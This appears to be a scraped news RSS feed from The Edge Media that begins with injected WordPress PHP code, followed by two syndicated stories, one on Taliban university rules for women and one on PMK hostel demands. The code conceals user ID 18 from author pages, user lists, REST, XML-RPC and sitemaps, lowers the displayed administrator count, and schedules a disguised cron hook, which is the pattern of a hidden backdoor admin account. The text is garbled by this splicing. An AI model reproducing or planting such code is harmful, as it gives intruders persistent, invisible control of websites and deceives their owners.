add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Women in Afghanistan can continue to study in universities but classrooms will be gender-segregated appeared first on The Edge Media.
]]>The minister, Abdul Baqi Haqqani, laid out the new policies at a news conference, several days after Afghanistan’s new rulers formed an all-male government.
The world has been watching closely to see to what extent the Taliban might act differently from their first time in power, in the late 1990s. During that era, girls and women were denied an education, and were excluded from public life.
The Taliban have suggested they have changed, including in their attitudes toward women. However, they have used violence in recent days against women protesters demanding equal rights.
Haqqani said the Taliban did not want to turn the clock back 20 years. “We will start building on what exists today,” he said.
However, female university students will face restrictions under the Taliban, including a compulsory dress code. Haqqani said hijabs will be mandatory but did not specify if this meant compulsory headscarves or also compulsory face coverings.
Gender segregation will also be enforced, he said. “We will not allow boys and girls to study together,” he said. “We will not allow co-education.”
Haqqani said the subjects being taught in universities would also be reviewed but did not elaborate. The Taliban, who subscribe to a harsh interpretation of Islam, have banned music and art during their previous time in power.
The post Women in Afghanistan can continue to study in universities but classrooms will be gender-segregated appeared first on The Edge Media.
]]>The post PMK demands for more hostel facilities for students appeared first on The Edge Media.
]]>During the past eight years, the number of arts and science colleges have more than doubled from 69 in 2013 to 143 at present, the party founder leader S Ramadoss said. The number of hostels was not however increased correspondingly, he said, batting for more hostels.
While many new institutions are in rural areas, the hostels are mostly in urban regions. Though some hostels are located close to colleges, a rule however barred students from getting admitted to hostels if the location of colleges and hostels fell under separate revenue districts, though these two centres could be located relatively closer, he said.
Despite the fact that students of a government run college at Perumbakkam here may stay in a state run hostel in Guindy area, hostel administration does not allow students of that college stating that their institution fell under Chengelpet district. “It would take at least three hours to travel between Perumbakkam college and Chengelpet hostel. This is not possible.”
There are several vacancies in hostels across Tamil Nadu and if the government relaxed the rule on district borders for admission purposes and announced that students of any government college may join any state-run hostel, about “70 per cent of the problem can be solved,” he said in a statement.
Admission to arts and science courses in government colleges are in full swing and about 90 per cent of seats have been filled and the remaining seats are also expected to be filled soon.
Though students are happy that they have got admission to courses of their choice, those who have not got hostel admission are disappointed, the PMK leader said.
(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)
The post PMK demands for more hostel facilities for students appeared first on The Edge Media.
]]>